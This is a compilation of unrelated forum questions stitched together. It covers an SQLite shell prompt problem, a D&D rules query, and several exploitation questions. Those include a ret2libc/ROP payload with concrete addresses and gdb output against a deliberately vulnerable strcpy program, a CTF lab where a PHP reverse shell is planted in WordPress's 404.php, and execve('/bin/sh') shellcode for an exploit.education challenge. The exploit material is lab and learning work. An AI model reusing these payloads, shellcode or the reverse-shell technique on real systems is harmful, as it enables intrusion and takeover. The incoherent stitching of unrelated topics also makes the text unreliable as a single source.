SQLite command line shell stuck on …> , CTRL+D not working

I’ve just started learning Databases, and the instructor is teaching SQLite with the command line shell. I downloaded sqlite-tools-win32-x86-3350400.zip from sqlite.org/download

When I enter false commands, like the first two you can see, I get the correct error messages. But when I enter a syntax error: ("Steve, 87654) for example, it’s stuck on …> waiting for more input.
After searching on the internet, users suggested the solution "CTRL+D", but it doesn’t work for me. CTRL+C however just exits sqlite3.

My question: How do I get out of …> to continue with my commands? Why doesn’t CTRL+D work for me to get out of the …>: is it because of the syntax error or other possible causes? How do I fix my problem?

    C:\Users\myUser>sqlite3 test.db
    SQLite version 3.35.4 2021-04-02 15:20:15
    Enter ".help" for usage hints.
    sqlite> SELECT * FROM contacts;
    Tim|654321|tim@email.com
    Brian|1234|brian@mygmail.com
    sqlite> INSERT INTO contacts VALUES("Steve", 87654);
    Error: table contacts has 3 columns but 2 values were supplied
    sqlite> INSERT INTO contacts VALUES(Steve, 87654);
    Error: no such column: Steve
    sqlite> INSERT INTO contacts VALUES("Steve, 87654);  // Intentional for demonstration //
       ...> ^D  // Entered CTRL+D //
       ...> ;
       ...>     // Entered CTRL+C //
    Error: unrecognized token: ""Steve, 87654)"

    C:\Users\myUser>

How does a Cloak of Displacement interact with a tortle’s Shell Defense?

The cloak has a property that causes creatures to have disadvantage on attack rolls against the one wearing it, and

This property is suppressed while you are incapacitated, restrained, or otherwise unable to move (DMG, pg 158).

The way Shell Defense is described

You can withdraw into your shell as an action… While in your shell, you are prone, your speed is 0 and can’t increase, you have disadvantage on Dexterity saving throws, you can’t take reactions, and the only action you can take is a bonus action to emerge from your shell (EGW, pg 181).

is effectively the same as being both incapacitated and restrained, with the only notable difference being that an attack against a prone creature

has advantage if the attacker is within 5 feet of the creature. Otherwise, the attack roll has disadvantage (PHB, pg 292).

While extremely similar mechanically, the tortle using Shell Defense is technically neither restrained nor incapacitated. Furthermore, the ability to emerge from its shell as a bonus action implies the capacity to then move during that turn if the tortle chooses to, so neither are they otherwise unable to move.

As such, would the Cloak of Displacement work for a tortle using Shell Defense (and thus cancel out the advantage melee attackers would normally have due to the prone condition)?

RAW and RAI interpretations are both desired.

ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A C program vulnerable to stack buffer overflow requires 112 bytes of stuffing to get to the return address of the calling function. Here strcpy() is the vulnerable function.

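    #include <string.h>

    /* Deliberately vulnerable: strcpy() copies name into buf with no length check. */
    void f(char *name){
      char buf[100];
      strcpy(buf, name);
    }

    int main(int argc, char *argv[]){
      f(argv[1]);
      return 0;
    }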

Trying to write the rop gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

    (gdb) print execl
    $1 = 0xb7eb7b60 <__GI_execl>
    (gdb) print exit
    $2 = 0xb7e359e0 <__GI_exit>
    (gdb) info proc map
    ...(output omitted)
    (gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"
    0xb7f62b0b
    1 pattern found.
    (gdb) x/s 0xb7f62b0b
    0xb7f62b0b:   "/bin/sh"
    (gdb) run $(python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')
    Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $(python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')
    process 3161 is executing new program: /bin/dash
    /bin/sh: 0: Can't open UWVS��������
    [Inferior 1 (process 3161) exited with code 0177]

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit, and got back another result. In brief, I added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

    addr. exit()
    fake byte (NULL will be written here)
    addr. /bin/sh
    addr. /bin/sh
    addr. pop\pop\pop\ret
    addr. execl()
    addr. where to write NULL byte
    addr. pop\ret
    addr. gets()        <-- ESP will be here when is time to return to caller
    112 NOP

From gdb I run the exploit, I type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands under gdb I used to take the stack layer:

    (gdb) b 10     --> this is to stop after strcpy() in the .c code
    Breakpoint 1 at 0x8048497: file main.c, line 10.
    (gdb) run $(python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')
    Starting program: /home/marco/rop/main $(python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')
    Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10
    (gdb) b *execl
    Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.
    (gdb) c
    Continuing.
    Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31
    31    execl.c: File o directory non esistente.
    (gdb) x/x $esp
    0xbffff5ec:   0xb7ef334f
    (gdb) x/x $esp+4
    0xbffff5f0:   0xb7f64a0b
    (gdb) x/x $esp+8
    0xbffff5f4:   0xb7f64a0b
    (gdb) x/4x $esp+12
    0xbffff5f8:   0x00    0x42    0x42    0x42
    (gdb) x/s $esp+12
    0xbffff5f8:   ""

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

    "\xe0\x83\xe6\xb7" +   -> gets()
    "\x6e\xd0\xe2\xb7" +   -> pop/ret
    "\xf8\xf5\xff\xbf" +   -> address where to write NULL
    "\x80\x9a\xeb\xb7" +   -> execl()
    "\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret
    "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh
    "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh
    "\x42\x42\x42\x42" +   -> fake address to be overwritten
    "\xd0\x79\xe3\xb7"     -> exit()
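
The overflow in the post above comes from strcpy() writing argv[1] into the 100-byte buf with no length check. As an added example (not part of the original post), here is a bounded counterpart of f() that rejects oversized input instead of writing past the buffer; copy_bounded and f_checked are hypothetical names introduced for illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 100   /* same size as buf[] in the post */

/* Hypothetical helper (not from the post): copy src into dst only if it
 * fits, terminating NUL included. Returns 0 on success, -1 otherwise. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    /* Look for the NUL within the first dst_size bytes only. */
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL) {          /* string plus NUL does not fit: reject */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Hardened counterpart of f(): oversized input is refused, so nothing is
 * written beyond buf toward the saved return address.
 * Returns the copied length, or -1 if the input was rejected. */
int f_checked(const char *name)
{
    char buf[BUF_SIZE];
    if (copy_bounded(buf, sizeof buf, name) != 0)
        return -1;
    return (int)strlen(buf);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {             /* the original dereferenced argv[1] blindly */
        fprintf(stderr, "usage: %s <name>\n", argv[0]);
        return 1;
    }
    if (f_checked(argv[1]) < 0) {
        fprintf(stderr, "name too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```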

Reverse shell from behind NAT and Firewall

I am new here so I apologize for not providing complete details. Let me explain the problem now. I was working on Ganana 1 CTF challenge. To up the challenge, I decided to place this CTF machine behind a router. My entire LAB is on VMware. For this scenario, I used three virtual machines: Kali, IPfire and Ganana 1 CTF machine.

Kali Linux is my attacker machine which received its IP from VMware NAT (192.168.44.5).

IPfire is installed as a router cum firewall with RED + GREEN configuration. The RED (external) interface received its IP address (192.168.44.3) from VMware NAT and for the GREEN interface IPfire acts as a DHCP server (192.168.33.1).

Now, I connected Ganana CTF machine to the GREEN interface of the IPfire. Its IP address is 192.168.33.11.

The GREEN interface is allowed to have internet. Now, when I port scanned the Ganana CTF machine from my Kali, port 80 can be accessed. As part of the challenge, I got access to the WordPress installation on the target machine. It is here I decided to edit the 404.php page to change the code to that of the PHP reverse shell by pentest monkey. I configured it to connect to my attacker machine’s IP address (192.168.44.5) port 1234. But the reverse shell is not working. However, when Kali and Ganana 1 are placed on the same network (NAT) the shell is working.

What is the mistake I am making?

Reverse shell from behind firewall and NAT

I have been working on a cyber security project in which I placed a web server behind an IPfire router (external IP 192.168.44.3). This is part of a GREEN LAN network (say IP is 192.168.33.11). I am trying to get a reverse shell from this target web server to my attacker machine Kali (IP 192.168.44.5). Can somebody help me in detail as to how to get this reverse shell successfully?

Exploit education stack-five: trouble opening shell

I’m trying the phoenix vm, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I ran into a problem while exploiting a stack overflow. The challenge is to run execve(‘/bin/sh’) through shellcode. I grabbed the shellcode from shellstorm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:

    [NOP slide]
    (debug int3 \xcc)
    "\x48\x31\xd2"                                  // xor    %rdx, %rdx
    "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
    "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
    "\x53"                                          // push   %rbx
    "\x48\x89\xe7"                                  // mov    %rsp, %rdi
    "\x50"                                          // push   %rax
    "\x57"                                          // push   %rdi
    "\x48\x89\xe6"                                  // mov    %rsp, %rsi
    "\xb0\x3b"                                      // mov    $0x3b, %al
    "\x0f\x05";                                     // syscall
    (debug int3 \xcc)
    [padding]
    [override rip pointing to the middle of the NOP slide]

I have tested int3’s before and after the shellcode and all seems fine, they both trigger outside and inside gdb and therefore I infer that the shellcode is being executed but I cannot get the shell open.

I’m using these commands:

cat | /opt/phoenix/amd64/stack-five < exploit 
cat exploit - | /opt/phoenix/amd64/stack-five 

Neither of them gets the shell.

Example of execution

    user@phoenix-amd64:~$ cat exploit - | /opt/phoenix/amd64/stack-five
    cat exploit - | /opt/phoenix/amd64/stack-five
    Welcome to phoenix/stack-five, brought to you by https://exploit.education
    [ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0
    whoami
    Trace/breakpoint trap

This int3 is AFTER the shellcode.

Any idea of what’s wrong?